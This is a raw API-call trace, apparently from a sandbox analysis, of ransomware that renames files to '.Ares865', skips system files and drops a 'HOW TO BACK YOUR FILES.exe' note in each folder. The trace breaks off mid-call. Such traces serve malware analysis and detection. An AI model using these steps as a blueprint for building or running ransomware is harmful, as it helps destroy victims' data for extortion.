[0114.945] lstrcmpiW (lpString1="s.ini", lpString2="accdc") returned 1 [0114.945] lstrlenW (lpString="accde") returned 5 [0114.945] lstrcmpiW (lpString1="s.ini", lpString2="accde") returned 1 [0114.945] lstrlenW (lpString="accdr") returned 5 [0114.945] lstrcmpiW (lpString1="s.ini", lpString2="accdr") returned 1 [0114.945] lstrlenW (lpString="accdt") returned 5 [0114.945] lstrcmpiW (lpString1="s.ini", lpString2="accdt") returned 1 [0114.945] lstrlenW (lpString="accdw") returned 5 [0114.945] lstrcmpiW (lpString1="s.ini", lpString2="accdw") returned 1 [0114.945] lstrlenW (lpString="accft") returned 5 [0114.945] lstrcmpiW (lpString1="s.ini", lpString2="accft") returned 1 [0114.945] lstrlenW (lpString="adb") returned 3 [0114.945] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0114.945] lstrlenW (lpString="adb") returned 3 [0114.945] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0114.945] lstrlenW (lpString="ade") returned 3 [0114.945] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0114.945] lstrlenW (lpString="adf") returned 3 [0114.945] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0114.945] lstrlenW (lpString="adn") returned 3 [0114.945] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0114.945] lstrlenW (lpString="adp") returned 3 [0114.945] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0114.945] lstrlenW (lpString="alf") returned 3 [0114.945] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0114.945] lstrlenW (lpString="ask") returned 3 [0114.945] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0114.945] lstrlenW (lpString="btr") returned 3 [0114.945] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0114.945] lstrlenW (lpString="cat") returned 3 [0114.945] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0114.945] lstrlenW (lpString="cdb") returned 3 [0114.945] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0114.945] lstrlenW (lpString="ckp") returned 3 [0114.945] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0114.945] lstrlenW (lpString="cma") returned 3 [0114.946] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0114.946] lstrlenW (lpString="cpd") returned 3 [0114.946] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0114.946] lstrlenW (lpString="dacpac") returned 6 [0114.946] lstrcmpiW (lpString1="gs.ini", lpString2="dacpac") returned 1 [0114.946] lstrlenW (lpString="dad") returned 3 [0114.946] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0114.946] lstrlenW (lpString="dadiagrams") returned 10 [0114.946] lstrcmpiW (lpString1="ttings.ini", lpString2="dadiagrams") returned 1 [0114.946] lstrlenW (lpString="daschema") returned 8 [0114.946] lstrcmpiW (lpString1="ings.ini", lpString2="daschema") returned 1 [0114.946] lstrlenW (lpString="db-journal") returned 10 [0114.946] lstrcmpiW (lpString1="ttings.ini", lpString2="db-journal") returned 1 [0114.946] lstrlenW (lpString="db-shm") returned 6 [0114.946] lstrcmpiW (lpString1="gs.ini", lpString2="db-shm") returned 1 [0114.946] lstrlenW (lpString="db-wal") returned 6 [0114.946] lstrcmpiW (lpString1="gs.ini", lpString2="db-wal") returned 1 [0114.946] lstrlenW (lpString="dbc") returned 3 [0114.946] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0114.946] lstrlenW (lpString="dbs") returned 3 [0114.946] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0114.946] lstrlenW (lpString="dbt") returned 3 [0114.946] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0114.946] lstrlenW (lpString="dbv") returned 3 [0114.946] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0114.946] lstrlenW (lpString="dbx") returned 3 [0114.946] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0114.946] lstrlenW (lpString="dcb") returned 3 [0114.946] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0114.947] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0114.947] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0114.947] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0114.948] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\settings.ini.Ares865") returned 59 [0114.948] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\settings.ini" (normalized: "c:\\program files (x86)\\windows sidebar\\settings.ini"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\settings.ini.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\settings.ini.ares865"), dwFlags=0x1) returned 1 [0114.955] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\settings.ini.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\settings.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0114.955] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=80) returned 1 [0114.955] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0114.956] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0114.956] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0114.956] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0114.956] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0114.956] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0114.956] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x170 [0114.960] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0114.960] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0114.966] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0114.966] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0114.966] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0114.966] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0114.966] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0114.966] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0114.966] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0114.966] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0114.966] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0114.966] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0114.966] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0114.966] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0114.966] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0114.967] CloseHandle (hObject=0x170) returned 1 [0114.967] CloseHandle (hObject=0x118) returned 1 [0114.967] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0114.967] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0114.967] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0114.967] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x51cf1c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x51cf1c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Shared Gadgets", cAlternateFileName="SHARED~1")) returned 1 [0114.967] lstrcmpiW (lpString1="Shared Gadgets", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0114.967] lstrcmpiW (lpString1="Shared Gadgets", lpString2="aoldtz.exe") returned 1 [0114.967] lstrcmpiW (lpString1="Shared Gadgets", lpString2=".") returned 1 [0114.967] lstrcmpiW (lpString1="Shared Gadgets", lpString2="..") returned 1 [0114.967] lstrcmpiW (lpString1="Shared Gadgets", lpString2="windows") returned -1 [0114.967] lstrcmpiW (lpString1="Shared Gadgets", lpString2="bootmgr") returned 1 [0114.967] lstrcmpiW (lpString1="Shared Gadgets", lpString2="temp") returned -1 [0114.967] lstrcmpiW (lpString1="Shared Gadgets", lpString2="pagefile.sys") returned 1 [0114.967] lstrcmpiW (lpString1="Shared Gadgets", lpString2="boot") returned 1 [0114.967] lstrcmpiW (lpString1="Shared Gadgets", lpString2="ids.txt") returned 1 [0114.967] lstrcmpiW (lpString1="Shared Gadgets", lpString2="ntuser.dat") returned 1 [0114.967] lstrcmpiW (lpString1="Shared Gadgets", lpString2="perflogs") returned 1 [0114.967] lstrcmpiW (lpString1="Shared Gadgets", lpString2="MSBuild") returned 1 [0114.967] lstrlenW (lpString="Shared Gadgets") returned 14 [0114.967] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\settings.ini") returned 51 [0114.967] lstrcpyW (in: lpString1=0x2cce44e, lpString2="Shared Gadgets" | out: lpString1="Shared Gadgets") returned="Shared Gadgets" [0114.967] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e77c8 [0114.968] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6c) returned 0x2e4710 [0114.968] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e77d0 | out: ListHead=0x2e7710, ListEntry=0x2e77d0) returned 0x2e7810 [0114.968] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3e26afc, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3e26afc, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3e4cc5c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x11ea00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sidebar.exe", cAlternateFileName="")) returned 1 [0114.968] lstrcmpiW (lpString1="sidebar.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0114.968] lstrcmpiW (lpString1="sidebar.exe", lpString2="aoldtz.exe") returned 1 [0114.968] lstrcmpiW (lpString1="sidebar.exe", lpString2=".") returned 1 [0114.968] lstrcmpiW (lpString1="sidebar.exe", lpString2="..") returned 1 [0114.968] lstrcmpiW (lpString1="sidebar.exe", lpString2="windows") returned -1 [0114.968] lstrcmpiW (lpString1="sidebar.exe", lpString2="bootmgr") returned 1 [0114.968] lstrcmpiW (lpString1="sidebar.exe", lpString2="temp") returned -1 [0114.968] lstrcmpiW (lpString1="sidebar.exe", lpString2="pagefile.sys") returned 1 [0114.968] lstrcmpiW (lpString1="sidebar.exe", lpString2="boot") returned 1 [0114.968] lstrcmpiW (lpString1="sidebar.exe", lpString2="ids.txt") returned 1 [0114.968] lstrcmpiW (lpString1="sidebar.exe", lpString2="ntuser.dat") returned 1 [0114.968] lstrcmpiW (lpString1="sidebar.exe", lpString2="perflogs") returned 1 [0114.968] lstrcmpiW (lpString1="sidebar.exe", lpString2="MSBuild") returned 1 [0114.968] lstrlenW (lpString="sidebar.exe") returned 11 [0114.968] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Shared Gadgets") returned 53 [0114.968] lstrcpyW (in: lpString1=0x2cce44e, lpString2="sidebar.exe" | out: lpString1="sidebar.exe") returned="sidebar.exe" [0114.968] lstrlenW (lpString="sidebar.exe") returned 11 [0114.968] lstrlenW (lpString="Ares865") returned 7 [0114.968] lstrcmpiW (lpString1="bar.exe", lpString2="Ares865") returned 1 [0114.968] lstrlenW (lpString=".dll") returned 4 [0114.968] lstrcmpiW (lpString1="sidebar.exe", lpString2=".dll") returned 1 [0114.968] lstrlenW (lpString=".lnk") returned 4 [0114.968] lstrcmpiW (lpString1="sidebar.exe", lpString2=".lnk") returned 1 [0114.968] lstrlenW (lpString=".ini") returned 4 [0114.968] lstrcmpiW (lpString1="sidebar.exe", lpString2=".ini") returned 1 [0114.968] lstrlenW (lpString=".sys") returned 4 [0114.968] lstrcmpiW (lpString1="sidebar.exe", lpString2=".sys") returned 1 [0114.968] lstrlenW (lpString="sidebar.exe") returned 11 [0114.969] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\sidebar.exe.Ares865") returned 58 [0114.969] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\sidebar.exe" (normalized: "c:\\program files (x86)\\windows sidebar\\sidebar.exe"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\sidebar.exe.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\sidebar.exe.ares865"), dwFlags=0x1) returned 1 [0114.971] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\sidebar.exe.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\sidebar.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0114.971] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1174016) returned 1 [0114.971] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0114.971] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0114.971] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0114.971] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0114.972] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0114.972] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0114.972] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11ed00, lpName=0x0) returned 0x170 [0114.976] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11ed00) returned 0x3030000 [0115.072] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0115.073] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.073] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0115.073] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0115.073] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4800 | out: hHeap=0x2b0000) returned 1 [0115.073] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0115.073] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0115.073] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0115.073] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0115.073] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0115.073] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0115.073] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0115.073] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0115.073] UnmapViewOfFile (lpBaseAddress=0x3030000) returned 1 [0115.084] CloseHandle (hObject=0x170) returned 1 [0115.084] CloseHandle (hObject=0x118) returned 1 [0115.084] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0115.084] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0115.084] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0115.089] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b27b844, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x4b27b844, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0xb1525cf0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1a800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wlsrvc.dll", cAlternateFileName="")) returned 1 [0115.089] lstrcmpiW (lpString1="wlsrvc.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0115.089] lstrcmpiW (lpString1="wlsrvc.dll", lpString2="aoldtz.exe") returned 1 [0115.089] lstrcmpiW (lpString1="wlsrvc.dll", lpString2=".") returned 1 [0115.089] lstrcmpiW (lpString1="wlsrvc.dll", lpString2="..") returned 1 [0115.089] lstrcmpiW (lpString1="wlsrvc.dll", lpString2="windows") returned 1 [0115.089] lstrcmpiW (lpString1="wlsrvc.dll", lpString2="bootmgr") returned 1 [0115.089] lstrcmpiW (lpString1="wlsrvc.dll", lpString2="temp") returned 1 [0115.089] lstrcmpiW (lpString1="wlsrvc.dll", lpString2="pagefile.sys") returned 1 [0115.089] lstrcmpiW (lpString1="wlsrvc.dll", lpString2="boot") returned 1 [0115.089] lstrcmpiW (lpString1="wlsrvc.dll", lpString2="ids.txt") returned 1 [0115.089] lstrcmpiW (lpString1="wlsrvc.dll", lpString2="ntuser.dat") returned 1 [0115.089] lstrcmpiW (lpString1="wlsrvc.dll", lpString2="perflogs") returned 1 [0115.089] lstrcmpiW (lpString1="wlsrvc.dll", lpString2="MSBuild") returned 1 [0115.089] lstrlenW (lpString="wlsrvc.dll") returned 10 [0115.089] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\sidebar.exe") returned 50 [0115.089] lstrcpyW (in: lpString1=0x2cce44e, lpString2="wlsrvc.dll" | out: lpString1="wlsrvc.dll") returned="wlsrvc.dll" [0115.089] lstrlenW (lpString="wlsrvc.dll") returned 10 [0115.089] lstrlenW (lpString="Ares865") returned 7 [0115.089] lstrcmpiW (lpString1="rvc.dll", lpString2="Ares865") returned 1 [0115.089] lstrlenW (lpString=".dll") returned 4 [0115.089] lstrcmpiW (lpString1="wlsrvc.dll", lpString2=".dll") returned 1 [0115.090] lstrlenW (lpString=".lnk") returned 4 [0115.090] lstrcmpiW (lpString1="wlsrvc.dll", lpString2=".lnk") returned 1 [0115.090] lstrlenW (lpString=".ini") returned 4 [0115.090] lstrcmpiW (lpString1="wlsrvc.dll", lpString2=".ini") returned 1 [0115.090] lstrlenW (lpString=".sys") returned 4 [0115.090] lstrcmpiW (lpString1="wlsrvc.dll", lpString2=".sys") returned 1 [0115.090] lstrlenW (lpString="wlsrvc.dll") returned 10 [0115.090] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\wlsrvc.dll.Ares865") returned 57 [0115.090] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\wlsrvc.dll" (normalized: "c:\\program files (x86)\\windows sidebar\\wlsrvc.dll"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\wlsrvc.dll.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\wlsrvc.dll.ares865"), dwFlags=0x1) returned 1 [0115.092] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\wlsrvc.dll.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\wlsrvc.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.093] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=108544) returned 1 [0115.093] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0115.093] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0115.093] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0115.093] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0115.094] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.094] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0115.094] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1ab00, lpName=0x0) returned 0x170 [0115.096] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1ab00) returned 0x190000 [0115.108] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0115.109] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.109] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0115.109] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0115.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4800 | out: hHeap=0x2b0000) returned 1 [0115.109] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0115.109] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0115.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0115.109] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0115.109] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0115.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0115.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0115.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0115.109] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0115.110] CloseHandle (hObject=0x170) returned 1 [0115.110] CloseHandle (hObject=0x118) returned 1 [0115.110] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0115.110] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0115.110] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0115.111] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b27b844, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x4b27b844, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0xb1525cf0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1a800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wlsrvc.dll", cAlternateFileName="")) returned 0 [0115.111] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0115.111] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e77d0 [0115.111] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Shared Gadgets", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Shared Gadgets") returned="C:\\Program Files (x86)\\Windows Sidebar\\Shared Gadgets" [0115.111] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0115.111] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e77c8 | out: hHeap=0x2b0000) returned 1 [0115.111] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Shared Gadgets") returned 53 [0115.111] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Shared Gadgets" | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Shared Gadgets") returned="C:\\Program Files (x86)\\Windows Sidebar\\Shared Gadgets" [0115.111] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0115.111] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Shared Gadgets\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\windows sidebar\\shared gadgets\\how to back your files.exe"), bFailIfExists=1) returned 0 [0115.112] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0115.113] GetLastError () returned 0x0 [0115.113] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0115.113] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0115.113] CloseHandle (hObject=0x120) returned 1 [0115.113] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0115.113] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0115.113] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Windows 